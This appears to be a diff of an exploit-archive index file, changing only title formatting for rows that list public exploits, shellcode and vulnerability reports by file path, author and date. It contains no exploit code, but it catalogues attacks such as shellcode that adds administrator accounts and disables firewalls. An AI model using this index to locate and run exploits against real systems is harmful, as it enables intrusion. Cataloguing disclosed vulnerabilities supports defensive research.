Tools",php,webapps,0 -35308,platforms/windows/remote/35308.html,"Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 +35308,platforms/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 35309,platforms/php/webapps/35309.txt,"Betsy 4.0 - 'page' Parameter Local File Include Vulnerability",2011-02-02,MizoZ,php,webapps,0 35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 - Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 @@ -31896,7 +31896,7 @@ id,file,description,date,author,platform,type,port 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 -35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 +35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 35401,platforms/php/webapps/35401.txt,"SnapProof 'retPageID' Parameter Cross-Site Scripting Vulnerability",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun Multiple SQL Injection Vulnerabilities",2011-03-02,eXeSoul,php,webapps,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 @@ -32082,12 +32082,12 @@ id,file,description,date,author,platform,type,port 35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double Free Local Denial of Service Vulnerability",2011-04-11,anonymous,linux,dos,0 35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 izle.asp id Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 -35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 +35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress - Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution Vulnerability",2011-04-11,"Felipe Ortega",linux,remote,0 -35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 -35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 +35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 +35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -32152,8 +32152,8 @@ id,file,description,date,author,platform,type,port 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS Vulnerability",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Include and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 35681,platforms/linux/local/35681.txt,"OProfile 0.9.6 'opcontrol' Utility 'set_event()' Local Privilege Escalation Vulnerability",2011-04-29,"Stephane Chauveau",linux,local,0 -35682,platforms/php/webapps/35682.txt,"Tine 2.0 'vbook.php' Cross Site Scripting Vulnerability",2011-04-30,"AutoSec Tools",php,webapps,0 -35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 'axes_default.css' Cross Site Scripting Vulnerability",2011-05-02,"Patrick Webster",java,webapps,0 +35682,platforms/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross Site Scripting Vulnerability",2011-04-30,"AutoSec Tools",php,webapps,0 +35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting Vulnerability",2011-05-02,"Patrick Webster",java,webapps,0 35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting Vulnerability",2011-05-02,"AutoSec Tools",php,webapps,0 35685,platforms/multiple/remote/35685.txt,"Asterisk 1.8.x SIP INVITE Request User Enumeration Weakness",2011-05-02,"Francesco Tornieri",multiple,remote,0 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip File) Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 @@ -32165,12 +32165,12 @@ id,file,description,date,author,platform,type,port 35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0 -35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0 +35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting Vulnerability",2011-05-03,Hector.x90,php,webapps,0 35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 -35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 'example.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0 +35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 'index.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 @@ -32178,7 +32178,7 @@ id,file,description,date,author,platform,type,port 35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0 35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80 35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0 -35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 'edit.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 +35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 'login.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-09,"AutoSec Tools",php,webapps,0 35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 'index.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 @@ -32189,7 +32189,7 @@ id,file,description,date,author,platform,type,port 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 'tce_xml_user_results.php' Multiple SQL Injection Vulnerabilities",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 'index.php' SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 -35726,platforms/php/webapps/35726.py,"GetSimple 3.0 'set' Parameter Local File Include Vulnerability",2011-05-07,"AutoSec Tools",php,webapps,0 +35726,platforms/php/webapps/35726.py,"GetSimple 3.0 - 'set' Parameter Local File Include Vulnerability",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design 'filedown.php' Local File Disclosure Vulnerability",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass Vulnerability",2011-05-09,@drk1wi,multiple,remote,0 @@ -32241,7 +32241,7 @@ id,file,description,date,author,platform,type,port 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows FILE Privilege Abuse",2015-01-13,metasploit,windows,remote,0 -35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Shell Upload",2015-01-13,metasploit,php,remote,80 +35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 - Shell Upload",2015-01-13,metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework <= 3.1.1 Help Servlet Cross Site Scripting Vulnerability",2011-05-18,"Sense of Security",hardware,remote,0 35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager <= 8.5 Common Services Device Center Cross Site Scripting Vulnerability",2011-05-18,"Sense of Security",hardware,remote,0 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services <= 3.1.1 Auditing Directory Traversal Vulnerability",2011-05-18,"Sense of Security",java,webapps,0 @@ -32253,7 +32253,7 @@ id,file,description,date,author,platform,type,port 35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection Vulnerability",2011-05-23,FL0RiX,php,webapps,0 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0 -35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0 +35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0 35793,platforms/win32/shellcode/35793.txt,"Obfuscated Shellcode Windows x86 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win32,shellcode,0 35794,platforms/win64/shellcode/35794.txt,"Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win64,shellcode,0 @@ -32265,7 +32265,7 @@ id,file,description,date,author,platform,type,port 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 Directory Traversal Vulnerability",2011-05-25,"Brian W. Gary",linux,remote,0 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure Vulnerability",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 -35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0 +35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution Vulnerability",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow Vulnerability",2011-05-27,"Kevin R.V",windows,remote,0 35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting Vulnerability",2011-05-31,LiquidWorm,asp,webapps,0 @@ -32293,12 +32293,12 @@ id,file,description,date,author,platform,type,port 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 'CKEditorFuncNum' Parameter Cross Site Scripting Vulnerability",2011-06-06,"AutoSec Tools",php,webapps,0 -35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes 'test.php' Cross Site Scripting Vulnerability",2011-06-06,MustLive,php,webapps,0 +35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross Site Scripting Vulnerability",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0 35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 -35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0 +35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass Vulnerability",2011-06-08,dst,linux,remote,0 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting Vulnerability",2011-06-07,LiquidWorm,php,webapps,0 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0 @@ -32312,12 +32312,12 @@ id,file,description,date,author,platform,type,port 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure Vulnerability",2011-07-27,securititracker,hardware,remote,0 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 -35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 +35847,platforms/osx/local/35847.c,"OS X networkd _effective_audit_token_ XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 35850,platforms/windows/local/35850.bat,"Microsoft Windows XP 'tskill' Local Privilege Escalation Vulnerability",2011-06-13,"Todor Donev",windows,local,0 35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection Vulnerabilities",2011-06-13,pentesters.ir,php,webapps,0 -35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0 +35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0 35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0 35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0 35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0 @@ -32340,25 +32340,25 @@ id,file,description,date,author,platform,type,port 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0 35873,platforms/windows/remote/35873.txt,"Wireshark 1.4.5 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,remote,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0 -35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0 +35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0 -35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0 +35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0 35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0 -35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0 +35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0 35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash PoC",2015-01-23,"Kapil Soni",windows,dos,0 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0 -35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0 +35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0 35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-28,"Luigi Auriemma",windows,dos,0 35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 @@ -32390,7 +32390,7 @@ id,file,description,date,author,platform,type,port 35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution Vulnerability",2011-06-30,"Tim Brown",multiple,remote,0 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow Vulnerability",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0 -35921,platforms/windows/remote/35921.html,"iMesh 10.0 'IMWebControl.dll' ActiveX Control Buffer Overflow Vulnerability",2011-07-04,KedAns-Dz,windows,remote,0 +35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow Vulnerability",2011-07-04,KedAns-Dz,windows,remote,0 35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include Vulnerability",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 @@ -32438,7 +32438,7 @@ id,file,description,date,author,platform,type,port 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS SQL Injection Vulnerability",2011-07-17,Lazmania61,php,webapps,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0 -35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 +35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 'snarf_ajax.php' Cross Site Scripting Vulnerability",2011-07-20,"High-Tech Bridge SA",php,webapps,0 @@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 -36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0 +36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 @@ -32481,25 +32481,25 @@ id,file,description,date,author,platform,type,port 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0 36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 -36033,platforms/php/webapps/36033.txt,"Search Network 2.0 'query' Parameter 